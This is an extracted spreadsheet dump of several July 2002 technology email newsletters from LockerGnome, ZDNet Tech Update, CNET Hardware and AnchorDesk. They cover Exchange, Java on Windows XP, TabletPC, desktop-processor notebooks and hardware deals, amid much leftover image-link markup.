    <t>![DVD PictureShow]([URL]http://www.qksrv.net[/URL]  \n---  \n|\n\n  07.17.2002 GnomeREPORT  \n  \n---  \n  \n**Why rely on BIND when you can get UltraDNS:** UltraDNS increases Web site\nperformance, reliability, and security all for as low as $1.00 a month. Click\nhere to find out more.  \n---  \n  \nBrooklyn Bridge for sale! No kidding! The town of Brooklyn, Iowa has a bridge\nthat they are selling on Ebay, so if you have a need for such a structure, or\njust want to have the right to say you legitimately purchased the Brooklyn\nBridge, here's your opportunity! Seriously, this is not a prank!\n\nEver since I was down toward Des Moines last week and had a cup-o-java with\nJake at Starbucks, I've been craving coffee. I can't see myself turning into a\ncoffee junkie like Chris, but it's just weird that this would happen, being\nthat my extent of coffee drinking has usually been limited to the severe need\nfor a quick morning wake-up or in an effort to keep warm on cold mornings when\nout in the field back in my Marine Corps days.\n\nAs time has gone on, I've been trying to cut back on the typical geek vices of\nsugar and caffeine, but I can't drink coffee straight. It has to be sweet, and\nwhat's the point of drinking coffee if there's no caffeine? Enter Splenda. An\nartificial sweetener that has finally made it to Waterloo, Iowa. Most of what\nDiana and I use sugar for has been modified to use Splenda instead, with good\nresults. Hopefully this coffee thing is just a temporary kick like it usually\nis. I have to brush my teeth after a cup or two from the nasty breath. It's\nfun to test out the dragon-breath on the cat to see just how bad it really is.\nIf Bootes sniffs a couple of times, it's not too bad, but if she instantly\nrecoils, time to employ the Sonicare for a couple of minutes. See what you've\nstarted, Jake?\n\nSee You in August,  \nRandy Nieland  \n\n  \n\n GnomeNETWORK  \n  \n---  \n  \n**Exchange Titanium Details Emerge**\n\n[URL]http://www.microsoft.com[/URL]\n\nOracle recently announced their intention to compete directly with Microsoft\nExchange, even accepting Outlook as an email client. In what seems like a\ndirect response, we're handed details of the 2003 release of Exchange\nTitanium. I've always liked what Exchange can do, so I'm certainly looking\nforward to seeing what the new features will be all about, but I'm also\ninterested in what Oracle will be bringing to the table. Better email\nfunctionality, control and security are the name of the game, whoever ends up\nbeing the vendor of choice. Included in this Q&amp;A; is a screenshot of what\nOutlook may look like once Office 11 is released. It's an interesting concept\nshot, showing some new ways they plan to handle email views. It doesn't say\nanything for Exchange functionality, but it's worth noting regardless.\n\n  \n\n GnomeSYSTEM  \n  \n---  \n  \n**Better Pocket PC Audio**  \nUnearthed by David Spencer\n\n[URL]http://home.adelphia.net[/URL]\n\nAn open source project is bringing a different spin to audio and video on\nPocket PCs, and my first impression is... cool! I like what they're working on\nhere. I decided to wipe out my Jornada yesterday, so I haven't done a direct\ncomparison between the iPaq 3870 and Jornada 565 for audio quality using this\nplayer, which has an equalizer built-in, but it definitely has potential\njudging from how it sounds on the iPaq right out of the gate. Definitely give\nthis a peek if you're one of those that likes to play audio and video on a\nPocket PC. Quite a few different versions are supported, so you should be able\nto find something appropriate to your device.\n\n  \n\n GnomeALERTZ  \n  \n---  \n  \n**Today's Top 5 kbAlertz**\n\n  * Q320278 - WD: "The Custom Dictionary  Is Not Available " Error When You Use Portuguese (Brazilian) Proofing Tools (Q320278)\n  * Q313147 - GetNtmsObjectAttribute Does Not Return Correct Size When the Buffer Is Too Small (Q313147)\n  * Q313317 - A GPO "Register PTR Records" Setting of "Disabled" Is Ignored (Q313317)\n  * Q310869 - STOP Error When You Start Windows After You Connect a Scanner (Q310869)\n  * Q310772 - PCMCIA Device May Not Work in Windows XP (Q310772)\n\nRecommend It!\n\n  \n\n GnomeASSISTANT  \n  \n---  \n  \n**50 OS X TIPS: Whether you're making the "switch" from Windows, upgrading\nfrom a previous version of Mac OS, or just want some helpful tricks to make\nusing OS X easier, this ebook is for you. Jake cover's everything from user\nmanagement, to some Terminal basics, to how to navigate differences between OS\n9 and OS X.Get your copy today!  \n---  \n  \n**Where's Java?**\n\n[URL]http://news.com.com[/URL]\n\nThree readers asked me about this very thing this week, and it's something you\nshould probably know about if you use Windows XP. Microsoft didn't bundle the\nJava Virtual Machine with Windows XP, and since the release of XP, the JVM has\nbeen avaialble via the Windows Update site as a "convenience" to users. Part\nof Sun's legal complaints surrounding how Microsoft has handled Java was that\nMicrosoft did not have the right to distribute their implementation via the\nweb, though they did have licensing rights to include it with Windows. So\nessentially, Microsoft has things backwards, as it seems. Well, to avoid\nfurther web distribution arguments, Microsoft has yanked the JVM from the\nWindows Update site and all other areas of Microsoft's web site. Microsoft is\nstill planning to include Java with Windows XP Service Pack 1. You'll have to\nplan for Java support accordingly, as SP1 is still a ways off and you can't\nget it from Microsoft at this point. If you need it for a new installation of\nWindows XP in the short term, Sun will gladly provide you with their own\ndistibution.\n\n  \n\n GnomeSTUFF  \n  \n---  \n  \n**Another Xeon Deal**  \nServed up by Warren Dugas\n\n[URL]http://www.tigerdirect.com[/URL]\ndetails.asp?sku=C170-1032%20P\n\nI mentioned a really nice deal on Compaq Evo W6000 dual- Xeon workstations a\nfew weeks back, which I know several of you took advantage of, but the $1999\nprice tag likely scared off many others. If you still want to get into a Xeon,\ncheck this one out. TigerDirect is offering an Evo W8000 workstation with a\nsingle 1.7GHz processor, 18.2GB 15,000rpm U160 drive, 48x CD-ROM and licenses\nfor both Windows 2000 Pro and NT 4.0 Workstation for $699.99. Note that there\nis NO memory and no video card included, so you'll have to scrounge those for\nyourself, but it really is a pretty good deal, on the whole. Also realize that\nthese systems take RAMBUS memory, which will add a bit of cost, so be sure you\nknow what you're getting - a wicked-fast workstation, to be sure!\nExpandability is also quite amazing with these machines.\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 Tell a Friend About Us!  \n Suggest a Feature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n E-mail a Suggestion  \n Your Rant / Rave  \n General Feedback  \n The Editor's Blog  \n E-mail the Editor  \n\n\n\nSOUND SYSTEMS  \n  \n---  \n  \nYamaha RX-V1200  \nSony DAVC900  \nHarman Kardon AVR520  \nDenon AVR5803  \nPioneer VSXD811S  \nPioneer Elite VSX49TX  \nSony HTDDW840  \nYamaha HTR5560  \nBOSE LS122BK  \nSony DAVC450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www.qksrv.net http://www.microsoft.com http://home.adelphia.net http://news.com.com http://www.tigerdirect.com http://www.lockergnome.com http://www.lockergnome.com</t>
  </si>
  <si>
    <t>To: qqqqqqqqqq-zdnet@example.com\nFrom: ZDNet Tech Update Today &lt;Online#3.20314.4f-dCw3gqtNlgTxGdRR.1@newsletter.online.com&gt;\nDate: Wed, 17 Jul 2002 06:32:59 -0700 (PDT)</t>
  </si>
  <si>
    <t>Wed, 17 Jul 2002 06:32:59 -0700 (PDT)</t>
  </si>
  <si>
    <t>ZDNet Tech Update Today &lt;Online#3.20314.4f-dCw3gqtNlgTxGdRR.1@newsletter.online.com&gt;</t>
  </si>
  <si>
    <t>Where TabletPC will succeed (Tech Update)</t>
  </si>
  <si>
    <t>\n\n![Tech Update Today]([URL]http://www.zdnet.com[/URL]\n|  | ![]([URL]http://www.zdnet.com[/URL]  \n---|---|---  \n![]([URL]http://www.zdnet.com[/URL] | ![]([URL]http://www.zdnet.com[/URL] |\n![]([URL]http://www.zdnet.com[/URL] |  | ![]([URL]http://www.zdnet.com[/URL] |\n![]([URL]http://www.zdnet.com[/URL]  \n![]([URL]http://www.zdnet.com[/URL]  \n\n![Tech Update Today]([URL]http://www.zdnet.com[/URL]  \n\n![]([URL]http://www.zdnet.com[/URL]  \n\nVITAL SIGNS FOR JULY 17, 2002  \n\n![]([URL]http://www.zdnet.com[/URL]  \n![]([URL]http://www.zdnet.com[/URL]  \n| ![]([URL]http://www.zdnet.com[/URL]  \n---  \n**David Berlind**  \n**Where TabletPC will succeed--and why**  \nOK, OK, you readers were right all along. I now believe that Microsoft"s\nTabletPC can be a big hit. Where? Vertical markets. Why? Development tools.  \n![]([URL]http://www.zdnet.com[/URL] **Why you won't be\nbuying one from Dell**  \n![]([URL]http://www.zdnet.com[/URL]  \n![]([URL]http://www.zdnet.com[/URL] | ![]([URL]http://www.zdnet.com[/URL] |\n![]([URL]http://www.zdnet.com[/URL]  \n**Latest from ZDNet News**  \n![]([URL]http://www.zdnet.com[/URL]  \n![]([URL]http://www.zdnet.com[/URL]  \n![]([URL]http://www.zdnet.com[/URL] CERT: Security reports\nmultiplying  \n![]([URL]http://www.zdnet.com[/URL]  \n![]([URL]http://www.zdnet.com[/URL] Microsoft squashes\nWindows 2000 bugs  \n![]([URL]http://www.zdnet.com[/URL]  \n![]([URL]http://www.zdnet.com[/URL] Sun's ID software gets a\nLiberty face-lift  \n![]([URL]http://www.zdnet.com[/URL]  \n![]([URL]http://www.zdnet.com[/URL] Mobile slump puts the\nbite on Bluetooth  \n![]([URL]http://www.zdnet.com[/URL]  \n![]([URL]http://www.zdnet.com[/URL] 'Rainbow' coalition to\nspread wireless  \n![]([URL]http://www.zdnet.com[/URL]  \n![]([URL]http://www.zdnet.com[/URL] Handspring courts\ncorporate buyers  \n![]([URL]http://www.zdnet.com[/URL]  \n![]([URL]http://www.zdnet.com[/URL] Apple patches serious\nsecurity hole  \n![]([URL]http://www.zdnet.com[/URL]  \n![]([URL]http://www.zdnet.com[/URL] **More Enterprise News**  \n![]([URL]http://www.zdnet.com[/URL]  \n![]([URL]http://www.zdnet.com[/URL]  \n![]([URL]http://www.zdnet.com[/URL]  \n| ![]([URL]http://www.zdnet.com[/URL]  \n![]([URL]http://www.zdnet.com[/URL]  \n![]([URL]http://www.zdnet.com[/URL]  \n**Farber's Picks**  \n|  ![]([URL]http://www.zdnet.com[/URL]  \n---  \n![]([URL]http://www.zdnet.com[/URL]  \n![]([URL]http://image.com.com[/URL]  \n\nDan  \nFarber\n\n![]([URL]http://www.zdnet.com[/URL] |\n![]([URL]http://www.zdnet.com[/URL]  \n---|---  \n**Slowing sales shrinking Intel workforce**  \nIntel announced lower-than-expected earnings yesterday and that **4,000 jobs**\n(5 percent of its staff) would be eliminated this year. This may bring Intel's\nmargins back in line, but the overall **outlook is not bright** in the coming\nmonths, despite Federal Reserve Chairman Alan Greenspan's optimism about a\nmore timely recovery.  \n![]([URL]http://www.zdnet.com[/URL] **Read the full story**\n\n**VMware ups consolidation ante**  \nThe new version of VMware's lower-end server product is slated to run atop the\nlatest versions of Linux from SuSE, MandrakeSoft and Red Hat, as well as\nMicrosoft Windows .Net Server due this year. Offering more Intel-server based\n**consolidation opportunities** than ever, **GSX Server 2.0** includes support\nfor AMD's **Athlon XP** and **Intel's Xeon** processors.  \n![]([URL]http://www.zdnet.com[/URL] **Read the full story**  \n![]([URL]http://www.zdnet.com[/URL] **Server consolidation\neases system management**\n\n![]([URL]http://techupdate.zdnet.com[/URL] |\n![]([URL]http://www.zdnet.com[/URL]  \n---|---  \n**Software contracts: Clause for alarm**  \nIn the high-stakes game of corporate software negotiations, the silver-tongued\nsales rep isn't your biggest challenge: It's the **language in the\ncontracts**. Enterprise customers spend surprisingly little time pouring over\nthe fine print of multi-million dollar software contracts that are rife with\nobscure terminology, vague expansion charges, and **mind-boggling license\nconversions**. As a result, they end up paying in ways they had never imagined\nlong after the deal is signed. Just ask California.  \n![]([URL]http://www.zdnet.com[/URL] **Read the fine print**\n\n**Six steps to the best TCO with Linux**  \nDon't just bring in Linux as yet another OS to manage. To help you determine\nwhether Linux offers better TCO than Windows, **Gartner** examines the\nbenefits and pitfalls of deploying Linux-based servers.  \n![]([URL]http://www.zdnet.com[/URL] **Read the full story**\n\n![]([URL]http://techupdate.zdnet.com[/URL] |\n![]([URL]http://www.zdnet.com[/URL]  \n---|---  \n**Rack server a la mode**  \nWith its Xserve rack-mount server, **Apple is moving into enterprise\nterritory**. The specs are impressive: Dual 1GHz PowerPC G4s, up to 2GB DDR\nSDRAM, two 64-bit 66MHz PCI slots (plus a third combination PCI/AGP slot),\ndual Gigabit Ethernet, FireWire and USB ports, and four Ultra ATA/100 Apple\nDrive Module bays. But **Bill O'Brien** thinks Apple's **licensing** may be\neven more appealing than the hardware.  \n![]([URL]http://www.zdnet.com[/URL] **Read the full story**\n\n![]([URL]http://techupdate.zdnet.com[/URL] |\n![]([URL]http://www.zdnet.com[/URL]  \n---|---  \n**A notebook with desktop muscle**  \n**WinBook's** big and heavy J4 uses a desktop Pentium 4 and leaves mobile P4-M\nnotebooks in the dust. That means heavy lifting for your spreadsheets--and\nyour shoulders. If you travel only occasionally and need **top performance** ,\nthis might be the sole computer for you.  \n![]([URL]http://www.zdnet.com[/URL] **Read the full review**\n\n![]([URL]http://www.zdnet.com[/URL] me at\n**dan.farber@cnet.com**  \n  \n![]([URL]http://www.zdnet.com[/URL]**Back to top**  \n  \n  \n  \n![]([URL]http://www.zdnet.com[/URL] | ![]([URL]http://www.zdnet.com[/URL]  \n| ![]([URL]http://www.zdnet.com[/URL]  \n![]([URL]http://www.zdnet.com[/URL] | ![]([URL]http://www.zdnet.com[/URL]  \n| ![]([URL]http://www.zdnet.com[/URL] | ![]([URL]http://www.zdnet.com[/URL] |  \n  \n**Also on Tech Update Today**  \n| ![]([URL]http://www.zdnet.com[/URL]  \n---  \n![]([URL]http://www.zdnet.com[/URL]  \n**FEATURE**  \n![]([URL]http://www.zdnet.com[/URL] |  **Top 10 Web services security\nrequirements**  \nSecurity is a critical, yet often overlooked, aspect of **Web services\ndevelopment**. Consider these requirements when working with your next\nproject.  \n  \n  \n---|---  \n**DOWNLOADS**  \n![]([URL]http://www.zdnet.com[/URL] |  **Stamp out the bugs**  \nDoes your code need a once-over? **Debug your software** with this collection\nof tools and utilities designed to locate and correct programming mistakes,\ntrack defects, and more.  \n  \n  \n---|---  \n**PREVIOUSLY ON TECH UPDATE TODAY**  \n![]([URL]http://www.zdnet.com[/URL] |  **Bridging the gap between Liberty and\nMicrosoft**  \nIt appears that we are closer to a **solution for single sign-on**. But what\nif Microsoft chooses not to support Liberty's specifications?\n\n**Microsoft stresses security for Exchange**  \nThe software giant plans to improve the Exchange Server e-mail system in the\nsoftware's first **major upgrade** in nearly two years.  \n  \n  \n---|---  \n![]([URL]http://www.zdnet.com[/URL]**Crucial Clicks\n--products worth looking at**  \n---  \n![]([URL]http://www.zdnet.com[/URL] |\n![]([URL]http://www.zdnet.com[/URL] |\n![]([URL]http://www.zdnet.com[/URL] |\n![]([URL]http://www.zdnet.com[/URL] |\n![]([URL]http://www.zdnet.com[/URL]  \n| **MONITORS**  \n![]([URL]http://www.zdnet.com[/URL]  \n  \n---  \n![]([URL]http://www.zdnet.com[/URL] |\n![]([URL]http://www.zdnet.com[/URL] | **A Porsche\nyou can afford**  \nSamsung paired up with F.A. Porsche designers to deliver the SyncMaster 171P,\na sleek, 17-inch LCD.  \n![]([URL]http://www.zdnet.com[/URL]  \n![]([URL]http://techupdate.zdnet.com[/URL] review  \n![]([URL]http://www.zdnet.com[/URL] |  |\n![]([URL]http://www.zdnet.com[/URL] Popular\nProducts  \n---  \n![]([URL]http://www.zdnet.com[/URL] |\n![]([URL]http://www.zdnet.com[/URL]  \n**Monitors**  \n![]([URL]http://www.zdnet.com[/URL]  \n**1**. Samsung SyncMaster 151S  \n![]([URL]http://www.zdnet.com[/URL]  \n**2**. NEC MultiSync 1550V  \n![]([URL]http://www.zdnet.com[/URL]  \n**3**. Envision EN-5100e  \n![]([URL]http://www.zdnet.com[/URL]  \n**4**. Samsung SyncMaster 570 V  \n![]([URL]http://www.zdnet.com[/URL]  \n**5**. Samsung SyncMaster 955 DF  \n![]([URL]http://www.zdnet.com[/URL]  \n![]([URL]http://techupdate.zdnet.com[/URL]**More popular\nmonitors**  \n![]([URL]http://www.zdnet.com[/URL]  \n| ![]([URL]http://www.zdnet.com[/URL]  \n![]([URL]http://www.zdnet.com[/URL]  \n![]([URL]http://www.zdnet.com[/URL]  \n  \n  \n**Elsewhere on ZDNet**  \n![]([URL]http://www.zdnet.com[/URL]  \n---  \n![]([URL]http://www.zdnet.com[/URL]  \n  \n**Need a memory upgrade? Find out with CNET's Memory Configurator.\n\nClearance Center: Get discounts on PCs, PDAs, MP3 players and more!\n\nFind out the top 10 Web services security requirements at Tech Update.\n\nBuilder.com shows you how to bring Java to the masses with Cold Fusion MX.\n\nCheck out thousands of IT job listings in ZDNet's Career Center. **  \n  \n  \n![]([URL]http://www.zdnet.com[/URL] | ![]([URL]http://www.zdnet.com[/URL] |\n![]([URL]http://www.zdnet.com[/URL] | ![]([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ontact us | ![]([URL]http://www.zdnet.com[/URL]  \n---|---|---|---|---  \n![]([URL]http://www.zdnet.com[/URL]  \n---  \n|\n\n  \n**Copyright 2002 CNET Networks, Inc. All rights reserved. ZDNet is a\nregistered service mark of CNET Networks, Inc.**\n\n|\n\n![]([URL]http://gserv.zdnet.com[/URL]  \n  \n---|---  \n![]([URL]http://clickthru.online.com[/URL]\n\n</t>
  </si>
  <si>
    <t>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image.com.com http://www.zdnet.com http://www.zdnet.com http://www.zdnet.com http://www.zdnet.com http://www.zdnet.com http://techupdate.zdnet.com http://www.zdnet.com http://www.zdnet.com http://www.zdnet.com http://techupdate.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qqqqqqqqqq-cnet-newsletters@example.com\nFrom: CNET Hardware Newsletter &lt;Online#3.20292.e9-wy20lAQKOdqZLsRR.1@newsletter.online.com&gt;\nDate: Wed, 17 Jul 2002 06:09:12 -0700 (PDT)</t>
  </si>
  <si>
    <t>Wed, 17 Jul 2002 06:09:12 -0700 (PDT)</t>
  </si>
  <si>
    <t>CNET Hardware Newsletter &lt;Online#3.20292.e9-wy20lAQKOdqZLsRR.1@newsletter.online.com&gt;</t>
  </si>
  <si>
    <t>Are bigger notebooks better?</t>
  </si>
  <si>
    <t>![CNET Computers.com\nNewsletter]([URL]http://a.r.tv.com[/URL]  \n| ![]([URL]http://home.cnet.com[/URL]  \n  \n---  \n![]([URL]http://home.cnet.com[/URL]  \n| ![]([URL]http://home.cnet.com[/URL]  \n| ![]([URL]http://home.cnet.com[/URL]  \n  \n![]([URL]http://home.cnet.com[/URL]  \n  \n  \n![]([URL]http://i.i.com.com[/URL]\n![]([URL]http://www.techrepublic.com[/URL]\n\n  \n  \n![Editors' Choice]([URL]http://www.cnet.com[/URL]  \n|  Samsung ML-1430 ![Editors'\nChoice]([URL]http://www.cnet.com[/URL]  \nIn Hardware  \n---  \nUnitech 2U4U DMR-300 ![Editors'\nChoice]([URL]http://www.cnet.com[/URL]  \nIn Electronics  \nVideo Explosion Deluxe ![Editors'\nChoice]([URL]http://www.cnet.com[/URL]  \nIn Software  \nSony Ericsson T68 ![Editors'\nChoice]([URL]http://www.cnet.com[/URL]  \nIn Wireless  \n  \n  \n  \n![CNET Search.com]([URL]http://a.r.tv.com[/URL]  \n![]([URL]http://cnet.com[/URL]  \n  \nComputers All CNET The Web  \n---  \n  \n![]([URL]http://a.r.tv.com[/URL]  \n| ![]([URL]http://home.cnet.com[/URL]  \n  \n---  \n![]([URL]http://home.cnet.com[/URL]  \n  \n![]([URL]http://home.cnet.com[/URL]  \n  \n| ![]([URL]http://home.cnet.com[/URL]  \n  \n---  \n![]([URL]http://home.cnet.com[/URL] | ![]([URL]http://home.cnet.com[/URL]  \n| ![]([URL]http://home.cnet.com[/URL] |  |  ![]([URL]http://home.cnet.com[/URL]  \n| ![]([URL]http://home.cnet.com[/URL]  \n![]([URL]http://home.cnet.com[/URL] 17, 2002  \n![]([URL]http://home.cnet.com[/URL]  \n|  ![]([URL]http://a.r.tv.com[/URL]  \n\--Tom Dunlap  \nSenior editor  \nCNET Hardware  \n|  |  **Dear Readers,**  \nOne of the hot trends in notebooks is squeezing desktop processors, not mobile\nCPUs, into laptops. Actually, the trend has been around for a while, but the\nbigger vendors used to pooh-pooh these efforts. (Intel was never too crazy\nabout the idea, either.) Now, it's a bona fide movement, and the latest\n9.6-pound desktop- replacement system from Toshiba takes this trend to new\nheights. But questions abound: Are the extra pounds worth it? Do these things\nreally get so hot that you can press pants with them? Executive Editor John\nMorris sorts it out for you.  \n  \n  \n---|---|---  \n![]([URL]http://home.cnet.com[/URL]  \n  \n|  ![advertisement]([URL]http://home.cnet.com[/URL]  \n---  \n**click here for details**  \n  \n|  |  |  \n  \n![Crucial Clicks]([URL]http://www.cnet.com[/URL]  \n![]([URL]http://home.cnet.com[/URL]  \n---  \n![]([URL]http://home.cnet.com[/URL] | ![]([URL]http://home.cnet.com[/URL] |\n![]([URL]http://home.cnet.com[/URL] | ![]([URL]http://home.cnet.com[/URL] |\n![]([URL]http://home.cnet.com[/URL]  \n| ![]([URL]http://a.r.tv.com[/URL] |\n![]([URL]http://home.cnet.com[/URL] | **Intel's new insides**  \nThe i845 chipset's many flavors are faster, better, and a lot more confusing.\nRead before you shop.  \n---|---|---  \n![]([URL]http://home.cnet.com[/URL]  \nÂ• Gateway 300 series keeps PCs simple  \nÂ• Modernize your motherboard  \n  \n![]([URL]http://home.cnet.com[/URL] |  | ![]([URL]http://home.cnet.com[/URL]  \n---  \n![]([URL]http://home.cnet.com[/URL] | ![]([URL]http://home.cnet.com[/URL] |\n![]([URL]http://home.cnet.com[/URL]  \n**Most popular**  \n![]([URL]http://home.cnet.com[/URL]  \n**Desktops**  \n![]([URL]http://home.cnet.com[/URL]  \n1\. Gateway 700XL  \n![]([URL]http://home.cnet.com[/URL]  \n2\. Dell Dimension 4000 series  \n![]([URL]http://home.cnet.com[/URL]  \n3\. HP Pavilion 950  \n![]([URL]http://home.cnet.com[/URL]  \n4\. Alienware Aurora DDR  \n![]([URL]http://home.cnet.com[/URL]  \n5\. Falcon Northwest Mach V  \n![]([URL]http://home.cnet.com[/URL]  \n![]([URL]http://a.r.tv.com[/URL] **See all most popular\ndesktops**  \n![]([URL]http://home.cnet.com[/URL]  \n| ![]([URL]http://home.cnet.com[/URL] | ![]([URL]http://home.cnet.com[/URL]  \n![]([URL]http://home.cnet.com[/URL]  \n![]([URL]http://home.cnet.com[/URL]  \n![]([URL]http://home.cnet.com[/URL]  \n![Reviews]([URL]http://a.r.tv.com[/URL]  \n![]([URL]http://home.cnet.com[/URL]  \n**Are bigger notebooks better?**  \nThe latest desktop-replacement notebook from Toshiba takes the desktop-chip\ntrend to new heights. But Toshiba's not alone. Keep up with the latest in\nExecutive Editor John Morris's Digital Domain column.  \n**Read the column**  \n  \n![]([URL]http://home.cnet.com[/URL]  \n**Desktop chip turbocharges WinBook J4**  \nWinBook's big and heavy J4 uses a desktop Pentium 4 and leaves mobile P4-M\nnotebooks in the dust. (It's a trend; see item No. 1.) Click here for the full\nreview of this speedy new WinBook.  \n**Read the review**  |  **Configure &amp; price**  \n  \n![]([URL]http://home.cnet.com[/URL]  \n**Apple eMac not just for education anymore**  \nIdeally suited to students living in small spaces and home users with basic\nneeds, the eMac is an attractive, adequately speedy, and easy-to-use PC\nwithout the flat-panel iMac's relatively high price. Wondering whether to go\nCRT or flat-panel? Read our review.  \n**Read the review**  |  **Configure &amp; price**  \n  \n![]([URL]http://home.cnet.com[/URL]  \n**Acer TravelMate 632XCi: P4 to the people**  \nAcer's new TravelMate delivers just what you'd expect from a mainstream\nnotebook. It's not the fastest mobile Pentium 4-M notebook we've tested, but\nit offers a solid set of features and long battery life in an attractive,\nrelatively low-cost package. Find out more here.  \n**Read the review**  |  **Check latest prices**  \n  \n![]([URL]http://home.cnet.com[/URL]  \n**Faster RAM boosts Atlas Micro GS 9800**  \nThank Sis Technology (not foot-dragging Intel) for the 645DX chipset that lets\nthe GS 9800 pair 333MHz DDR SDRAM with a Pentium 4 processor--a combination\nthat ekes out a bit more performance for the price. For more on this\naffordable system for gamers and enthusiasts, read our review.  \n**Read the review**  |  **Configure &amp; price**  \n  \n![]([URL]http://home.cnet.com[/URL]  \n**Samsung's bright, cheap, 19-inch CRT**  \nThe SyncMaster 950b has its bright points. This 19-inch CRT offers decent\nimage quality, it doesn't cost a bundle, and a special highlight zone lets you\nselect an area of your screen and ratchet up the brightness, making it good\nfor images or video. For more on this bright idea, read our review.  \n**Read the review**  |  **Check latest prices**  \n  \n\n|  ![CNET Message\nBoards]([URL]http://a.r.tv.com[/URL]  \n| ****  \n---|---  \n![]([URL]http://home.cnet.com[/URL]  \n![]([URL]http://home.cnet.com[/URL]  \n**CNET Message Boards: Computer Help is here**  \nStumped by computer hardware and software problems? Never fear; check out the\nCNET Message Boards, where quick help is just a post away. Join us in the\nComputer Help forums.\n\n![]([URL]http://www.cnet.com[/URL]\n![]([URL]http://www.cnet.com[/URL]  \n**\n\n  * Live tech help: submit your questions now\n  * CNET News.com: Top CIOs on the future of IT\n  * Find a job you love, with more than 1 million postings\n  * ZDNet: This IT director has had enough of Microsoft\n  * May Editors' Choice award: Pioneer's HTS-910DV \n**  \n---  \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05&amp;ISSUE=2002-07-17)  \n  \n---|---  \n![]([URL]http://clickthru.online.com[/URL]\n\n</t>
  </si>
  <si>
    <t>http://a.r.tv.com http://home.cnet.com http://home.cnet.com http://home.cnet.com http://home.cnet.com http://home.cnet.com http://i.i.com.com http://www.techrepublic.com http://www.cnet.com http://www.cnet.com http://www.cnet.com http://www.cnet.com http://www.cnet.com http://a.r.tv.com http://cnet.com http://a.r.tv.com http://home.cnet.com http://home.cnet.com http://home.cnet.com http://home.cnet.com http://home.cnet.com http://home.cnet.com http://home.cnet.com http://home.cnet.com http://home.cnet.com http://home.cnet.com http://home.cnet.com http://a.r.tv.com http://home.cnet.com http://home.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a.r.tv.com http://home.cnet.com http://home.cnet.com http://home.cnet.com http://home.cnet.com http://home.cnet.com http://home.cnet.com http://a.r.tv.com http://home.cnet.com http://home.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zdnet@example.com\nFrom: AnchorDesk &lt;Online#3.20284.fc-LmYwlaX_4cin49RR.1@newsletter.online.com&gt;\nDate: Wed, 17 Jul 2002 06:05:42 -0700 (PDT)</t>
  </si>
  <si>
    <t>Wed, 17 Jul 2002 06:05:42 -0700 (PDT)</t>
  </si>
  <si>
    <t>AnchorDesk &lt;Online#3.20284.fc-LmYwlaX_4cin49RR.1@newsletter.online.com&gt;</t>
  </si>
  <si>
    <t>Triple your dial-up Web surfing speeds! Here's how [ANCHORDESK]</t>
  </si>
  <si>
    <t>\n\n![AnchorDesk Daily]([URL]http://www.zdnet.com[/URL] |\n![Advertisement]([URL]http://www.zdnet.com[/URL]  \n\n![]([URL]http://i.i.com.com[/URL]\n![]([URL]http://www.techrepublic.com[/URL]\n\n  \n|  | ![]([URL]http://www.zdnet.com[/URL]  \n|  ![]([URL]http://www.zdnet.com[/URL]  \n![]([URL]http://www.zdnet.com[/URL]  \n**Need a memory upgrade? Find out with CNET's Memory Configurator.**  \n![]([URL]http://www.zdnet.com[/URL]  \n**Clearance Center: Get discounts on PCs, PDAs, MP3 players and more!**  \n![]([URL]http://www.zdnet.com[/URL]  \n**Find out the top 10 Web services security requirements at Tech Update.**  \n![]([URL]http://www.zdnet.com[/URL]  \n**Builder.com shows you how to bring Java to the masses with Cold Fusion MX.**  \n![]([URL]http://www.zdnet.com[/URL]  \n**Check out thousands of IT job listings in ZDNet's Career Center.**  \n![]([URL]http://www.zdnet.com[/URL]  \n  \n| ![]([URL]http://www.zdnet.com[/URL]  \n  \n---|---|---  \n![]([URL]http://www.zdnet.com[/URL]  \n![]([URL]http://www.zdnet.com[/URL] | ![]([URL]http://www.zdnet.com[/URL] |\n![]([URL]http://www.zdnet.com[/URL] |  |\n![]([URL]http://www.zdnet.com[/URL]  \n|  ![]([URL]http://www.zdnet.com[/URL]  \nWED JUL 17, 2002  \n![]([URL]http://www.zdnet.com[/URL]  \n| ![David\nCoursey]([URL]http://www.zdnet.com[/URL]  \n---  \n**  David Coursey** |\n![]([URL]http://www.zdnet.com[/URL]  \n---|---  \n![]([URL]http://www.zdnet.com[/URL]  \n---  \n![]([URL]http://www.zdnet.com[/URL]  \n**Triple your dial-up Web surfing speeds! Here's how**  \n![]([URL]http://www.zdnet.com[/URL]  \nWould you pay $5 or $7 a month to make your dial-up Web browsing two to five\ntimes faster? A company called Propel is betting you will. After testing the\ncompany's new service, I think it could actually fly. Let me explain.\n\n**NOTE: Why we're changing our publishing schedule**  \n![]([URL]http://www.zdnet.com[/URL]  \n**PLUS: AnchorDesk Radio: The best gear for your home network**  \n![]([URL]http://www.zdnet.com[/URL]  \n![]([URL]http://www.zdnet.com[/URL]  \n| ![]([URL]http://www.zdnet.com[/URL]  \n| ![]([URL]http://www.zdnet.com[/URL]  \n|  ![]([URL]http://www.zdnet.com[/URL]  \n![More on\nAnchorDesk]([URL]http://www.zdnet.com[/URL]  \nNew Windows XP on the way... Hackers get life... Bluetooth blues\n\nWhen is tiny too teensy? Your ideas on mini-gadgets\n\nHow to protect yourself against worms of the future\n\nMS home networking: What's in it for you\n\n![]([URL]http://www.zdnet.com[/URL]  \n| ![]([URL]http://www.zdnet.com[/URL]  \n  \n  \n![]([URL]http://www.zdnet.com[/URL]**Crucial Clicks:\nMore from ZDnet**  \n---  \n![]([URL]http://www.zdnet.com[/URL] |\n![]([URL]http://www.zdnet.com[/URL] |\n![]([URL]http://www.zdnet.com[/URL] |\n![]([URL]http://www.zdnet.com[/URL] |\n![]([URL]http://www.zdnet.com[/URL]  \n| **Printers**  \n![]([URL]http://www.zdnet.com[/URL]  \n  \n---  \n![]([URL]http://www.zdnet.com[/URL] |\n![]([URL]http://www.zdnet.com[/URL] | **Personal\nlasers for work or home**  \nLaser printers come in all shapes, sizes, and prices. Which one is right for\nyou? ZDNet reviewers recommend models for students, SOHOs, and more.  \n![]([URL]http://www.zdnet.com[/URL]  \n![]([URL]http://techupdate.zdnet.com[/URL] reviews  \n![]([URL]http://www.zdnet.com[/URL] |  |\n![]([URL]http://www.zdnet.com[/URL] Popular\nProducts  \n---  \n![]([URL]http://www.zdnet.com[/URL] |\n![]([URL]http://www.zdnet.com[/URL]  \n**Printers**  \n![]([URL]http://www.zdnet.com[/URL]  \n**1**. Canon S900  \n![]([URL]http://www.zdnet.com[/URL]  \n**2**. Samsung ML-1210  \n![]([URL]http://www.zdnet.com[/URL]  \n**3**. Epson Stylus Photo 2200  \n![]([URL]http://www.zdnet.com[/URL]  \n**4**. Canon S750  